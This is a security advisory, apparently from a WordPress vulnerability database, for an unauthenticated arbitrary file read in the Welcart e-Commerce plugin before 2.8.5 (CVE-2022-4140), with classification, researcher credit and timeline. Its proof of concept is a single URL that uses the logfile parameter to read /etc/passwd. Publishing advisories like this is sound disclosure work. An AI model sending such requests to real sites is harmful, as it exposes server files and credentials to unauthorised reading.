WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access

Description

The plugin does not validate user input before using it to output the content of a file, which could allow unauthenticated attacker to read arbitrary files on the server

This is a different issue than CVE-2022-41840

Proof of Concept

https://example.com/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd

Affects Plugins

usc-e-shop

Fixed in version 2.8.5

References

CVE

CVE-2022-4140

Classification

Type

FILE DOWNLOAD

OWASP top 10

A1: Injection

CWE

CWE-552

Miscellaneous

Original Researcher

Takeshi Suzuki

Submitter

Takeshi Suzuki

Verified

Yes

WPVDB ID

0d649a7e-3334-48f7-abca-fff0856e12c7

Timeline

Publicly Published

2022-12-05 (about 1 months ago)

Added

2022-12-06 (about 1 months ago)

Last Updated

2022-12-06 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin